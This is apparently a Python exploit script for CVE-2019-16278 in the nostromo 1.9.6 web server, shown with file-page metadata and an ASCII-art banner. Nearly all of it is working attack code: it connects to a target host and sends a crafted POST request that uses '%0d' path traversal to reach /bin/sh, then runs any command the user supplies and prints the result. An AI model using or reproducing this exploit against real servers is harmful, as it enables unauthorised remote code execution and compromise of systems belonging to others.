70 lines
No EOL
1.7 KiB
Python
Executable file
70 lines
No EOL
1.7 KiB
Python
Executable file
# Exploit Title: nostromo 1.9.6 - Remote Code Execution
|
|
# Date: 2019-12-31
|
|
# Exploit Author: Kr0ff
|
|
# Vendor Homepage:
|
|
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
|
|
# Version: 1.9.6
|
|
# Tested on: Debian
|
|
# CVE : CVE-2019-16278
|
|
|
|
cve2019_16278.py
|
|
|
|
#!/usr/bin/env python
|
|
|
|
import sys
|
|
import socket
|
|
|
|
art = """
|
|
|
|
_____-2019-16278
|
|
_____ _______ ______ _____\ \
|
|
_____\ \_\ | | | / / | |
|
|
/ /| || / / /|/ / /___/|
|
|
/ / /____/||\ \ \ |/| |__ |___|/
|
|
| | |____|/ \ \ \ | | | \
|
|
| | _____ \| \| | | __/ __
|
|
|\ \|\ \ |\ /| |\ \ / \
|
|
| \_____\| | | \_______/ | | \____\/ |
|
|
| | /____/| \ | | / | | |____/|
|
|
\|_____| || \|_____|/ \|____| | |
|
|
|____|/ |___|/
|
|
|
|
|
|
|
|
"""
|
|
|
|
help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'
|
|
|
|
def connect(soc):
|
|
response = ""
|
|
try:
|
|
while True:
|
|
connection = soc.recv(1024)
|
|
if len(connection) == 0:
|
|
break
|
|
response += connection
|
|
except:
|
|
pass
|
|
return response
|
|
|
|
def cve(target, port, cmd):
|
|
soc = socket.socket()
|
|
soc.connect((target, int(port)))
|
|
payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
|
|
soc.send(payload)
|
|
receive = connect(soc)
|
|
print(receive)
|
|
|
|
if __name__ == "__main__":
|
|
|
|
print(art)
|
|
|
|
try:
|
|
target = sys.argv[1]
|
|
port = sys.argv[2]
|
|
cmd = sys.argv[3]
|
|
|
|
cve(target, port, cmd)
|
|
|
|
except IndexError:
|
|
print(help_menu) |